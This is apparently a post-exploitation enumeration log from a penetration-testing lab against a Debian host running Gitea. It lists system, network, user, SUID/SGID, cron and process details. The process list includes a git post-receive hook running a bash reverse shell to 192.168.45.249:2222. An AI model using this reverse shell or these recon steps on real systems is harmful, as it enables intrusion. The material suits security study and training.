System/Kernel
chloe@roquefort:~/gitea-repositories/test/rce.git$ uname -a ; cat /etc/*release
Linux roquefort 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
VERSION_CODENAME=stretch
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"4.9.0-12-amd64x86_64Debian GNU/Linux 9 (stretch)
Networks
chloe@roquefort:~/gitea-repositories/test/rce.git$ ip route ; arp -a
default via 192.168.206.254 dev ens192 onlink
192.168.206.0/24 dev ens192 proto kernel scope link src 192.168.206.67
? (192.168.206.254) at 00:50:56:9e:8d:f2 [ether] on ens192chloe@roquefort:~/gitea-repositories/test/rce.git$ netstat -antup
netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 127.0.0.1:45626 ESTABLISHED -
tcp 0 140 192.168.206.67:35686 192.168.45.249:2222 ESTABLISHED 3887/bash
tcp 0 0 127.0.0.1:45628 127.0.0.1:3306 ESTABLISHED 747/gitea
tcp 0 0 127.0.0.1:45626 127.0.0.1:3306 ESTABLISHED 747/gitea
tcp 0 0 127.0.0.1:3306 127.0.0.1:45628 ESTABLISHED -
tcp6 0 0 :::2222 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN 747/gitea
tcp6 0 0 192.168.206.67:3000 192.168.45.249:34418 ESTABLISHED 747/gitea tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Users & Groups
chloe@roquefort:~/gitea-repositories/test/rce.git$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
chloe:x:1000:1000:chloe,,,:/home/chloe:/bin/bash
mysql:x:106:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/bin/false
ftp:x:108:65534::/srv/ftp:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
total 12K
4.0K drwxr-xr-x 4 chloe chloe 4.0K Apr 4 09:14 chloe
4.0K drwxr-xr-x 22 root root 4.0K Apr 24 2020 ..
4.0K drwxr-xr-x 3 root root 4.0K Apr 22 2020 .chloe@roquefort:~/gitea-repositories/test/rce.git$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=109(messagebus) groups=109(messagebus)
uid=1000(chloe) gid=1000(chloe) groups=1000(chloe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=106(mysql) gid=111(mysql) groups=111(mysql)
uid=107(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)uid=1000(chloe) gid=1000(chloe) groups=1000(chloe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
SUIDs
chloe@roquefort:~/gitea-repositories/test/rce.git$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
786528 32 -rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
786477 32 -rwsr-xr-x 1 root root 30800 Aug 21 2018 /bin/fusermount
786624 60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
786527 44 -rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
786525 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
265086 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
262222 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
262224 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
262221 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
262225 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
394506 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
399975 432 -rwsr-xr-x 1 root root 440728 Jul 15 2019 /usr/lib/openssh/ssh-keysign
397132 44 -rwsr-xr-- 1 root messagebus 42992 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helperSGIDs
chloe@roquefort:~/gitea-repositories/test/rce.git$ find / -perm -02000 -ls -type f 2>/dev/null | grep -v '/snap'
131300 4 drwxrwsr-x 2 root mail 4096 Apr 21 2020 /var/mail
131249 4 drwxrwsr-x 2 root staff 4096 Sep 8 2019 /var/local
132883 4 drwxr-s--- 2 mysql adm 4096 May 7 2020 /var/log/mysql
9483 0 drwxr-sr-x 3 root systemd-journal 60 Aug 2 2024 /run/log/journal
9484 0 drwxr-s--- 2 root systemd-journal 100 Apr 4 09:13 /run/log/journal/160ba85ed3f54fddb6d903b0b93d5707
262223 24 -rwxr-sr-x 1 root shadow 22808 May 17 2017 /usr/bin/expiry
266779 40 -rwxr-sr-x 1 root crontab 40264 Oct 7 2017 /usr/bin/crontab
262220 72 -rwxr-sr-x 1 root shadow 71856 May 17 2017 /usr/bin/chage
263083 28 -rwxr-sr-x 1 root tty 27448 Mar 7 2018 /usr/bin/wall
271763 20 -rwxr-sr-x 1 root mail 19008 Jan 17 2017 /usr/bin/dotlockfile
272034 352 -rwxr-sr-x 1 root ssh 358624 Jul 15 2019 /usr/bin/ssh-agent
266341 16 -rwxr-sr-x 1 root tty 14768 Apr 12 2017 /usr/bin/bsd-write
262433 4 drwxrwsr-x 10 root staff 4096 Apr 21 2020 /usr/local
262438 4 drwxrwsrwx 2 root staff 4096 Apr 24 2020 /usr/local/bin
262441 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/include
262439 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/games
262443 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/src
262436 4 drwxrwsr-x 6 root staff 4096 Apr 24 2020 /usr/local/share
268104 4 drwxrwsr-x 6 root staff 4096 Apr 24 2020 /usr/local/share/xml
268108 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/xml/schema
268105 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/xml/declaration
268107 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/xml/misc
268106 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/xml/entities
268098 4 drwxrwsr-x 7 root staff 4096 Apr 24 2020 /usr/local/share/sgml
268099 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/sgml/declaration
268100 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/sgml/dtd
268102 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/sgml/misc
268103 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/sgml/stylesheet
268101 4 drwxrwsr-x 2 root staff 4096 Apr 24 2020 /usr/local/share/sgml/entities
272419 4 drwxrwsr-x 2 root staff 4096 Apr 22 2020 /usr/local/share/ca-certificates
262437 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/share/man
262440 4 drwxrwsr-x 3 root staff 4096 Apr 22 2020 /usr/local/lib
396886 4 drwxrwsr-x 3 root staff 4096 Apr 22 2020 /usr/local/lib/python3.5
396887 4 drwxrwsr-x 2 root staff 4096 Apr 22 2020 /usr/local/lib/python3.5/dist-packages
262445 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/etc
262442 4 drwxrwsr-x 2 root staff 4096 Apr 21 2020 /usr/local/sbin
786453 36 -rwxr-sr-x 1 root shadow 35592 May 27 2017 /sbin/unix_chkpwdCapabilities
chloe@roquefort:~/gitea-repositories/test/rce.git$ getcap -r / 2>/dev/nullProcesses
chloe@roquefort:~/gitea-repositories/test/rce.git$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 56920 6700 ? Ss 09:10 0:00 /sbin/init
root 269 0.0 0.5 56848 5108 ? Ss 09:10 0:00 /lib/systemd/systemd-journald
root 273 0.0 1.1 214176 11724 ? Ssl 09:10 0:01 /usr/bin/vmtoolsd
root 286 0.0 0.4 46660 4772 ? Ss 09:10 0:00 /lib/systemd/systemd-udevd
systemd+ 331 0.0 0.4 127284 4144 ? Ssl 09:10 0:00 /lib/systemd/systemd-timesyncd
root 460 0.0 1.8 153504 18372 ? Ss 09:10 0:00 /usr/bin/VGAuthService
message+ 461 0.0 0.3 45128 3736 ? Ss 09:10 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 507 0.0 0.4 37980 4420 ? Ss 09:10 0:00 /lib/systemd/systemd-logind
root 509 0.0 0.3 250112 3076 ? Ssl 09:10 0:00 /usr/sbin/rsyslogd -n
root 510 0.0 0.2 29636 2732 ? Ss 09:10 0:00 /usr/sbin/cron -f
root 515 0.0 0.1 14524 1628 tty1 Ss+ 09:10 0:00 /sbin/agetty --noclear tty1 linux
root 537 0.0 0.0 10872 136 ? Ss 09:10 0:00 /usr/sbin/dropbear -p 2222 -W 65536
proftpd 548 0.0 0.3 124600 3684 ? Ss 09:10 0:00 proftpd: (accepting connections)
root 560 0.0 0.5 69956 5512 ? Ss 09:10 0:00 /usr/sbin/sshd -D
mysql 633 0.0 8.8 654876 90244 ? Ssl 09:10 0:01 /usr/sbin/mysqld
chloe 747 0.0 9.4 760196 96480 ? Ssl 09:10 0:02 /usr/local/bin/gitea web --config /etc/gitea/app.ini
chloe 3840 0.0 0.0 4276 752 ? S 10:18 0:00 /bin/sh -c git-receive-pack '/home/chloe/gitea-repositories/test/rce.git' git-receive-pack '/home/chloe/gitea-repositories/test/rce.git'
chloe 3841 0.0 0.3 93408 3904 ? S 10:18 0:00 git-receive-pack /home/chloe/gitea-repositories/test/rce.git
chloe 3872 0.0 0.2 11172 3052 ? S 10:18 0:00 bash hooks/post-receive
chloe 3885 0.0 0.2 11168 2968 ? S 10:18 0:00 /bin/bash ./hooks/post-receive.d/post-receive
chloe 3886 0.0 0.2 11164 2976 ? S 10:18 0:00 bash -c bash -i >& /dev/tcp/192.168.45.249/2222 0>&1
chloe 3887 0.0 0.4 21128 4948 ? S 10:18 0:00 bash -i
chloe 3947 0.0 0.3 38304 3248 ? R 10:22 0:00 ps -auxwwwroot 510 0.0 0.2 29636 2732 ? Ss 09:10 0:00 /usr/sbin/cron -froot 537 0.0 0.0 10872 136 ? Ss 09:10 0:00 /usr/sbin/dropbear -p 2222 -W 65536proftpd 548 0.0 0.3 124600 3684 ? Ss 09:10 0:00 proftpd: (accepting connections)mysql 633 0.0 8.8 654876 90244 ? Ssl 09:10 0:01 /usr/sbin/mysqldchloe 747 0.0 9.4 760196 96480 ? Ssl 09:10 0:02 /usr/local/bin/gitea web --config /etc/gitea/app.inichloe 3840 0.0 0.0 4276 752 ? S 10:18 0:00 /bin/sh -c git-receive-pack '/home/chloe/gitea-repositories/test/rce.git' git-receive-pack '/home/chloe/gitea-repositories/test/rce.git'chloe 3841 0.0 0.3 93408 3904 ? S 10:18 0:00 git-receive-pack /home/chloe/gitea-repositories/test/rce.git
Cron & Systemd
chloe@roquefort:~/gitea-repositories/test/rce.git$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for chloe
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2025-04-04 22:41:30 EDT 12h left Fri 2025-04-04 09:13:04 EDT 1h 10min ago apt-daily.timer apt-daily.service
Sat 2025-04-05 06:18:17 EDT 19h left Fri 2025-04-04 09:13:04 EDT 1h 10min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sat 2025-04-05 09:25:53 EDT 23h left Fri 2025-04-04 09:25:53 EDT 58min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
Pass --all to see loaded but inactive timers, too.Services
chloe@roquefort:~/gitea-repositories/test/rce.git$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
dropbear.service loaded active running LSB: Lightweight SSH server
getty@tty1.service loaded active running Getty on tty1
gitea.service loaded active running Gitea (Git with a cup of tea)
mariadb.service loaded active running MariaDB 10.1.44 database server
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
proftpd.service loaded active running LSB: Starts ProFTPD daemon
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
24 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.dropbear.servicegitea.servicemariadb.service
Sudo Version
chloe@roquefort:~/gitea-repositories/test/rce.git$ sudo --version
bash: sudo: command not foundGlibc Version
chloe@roquefort:~/gitea-repositories/test/rce.git$ ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.24-11+deb9u4) 2.24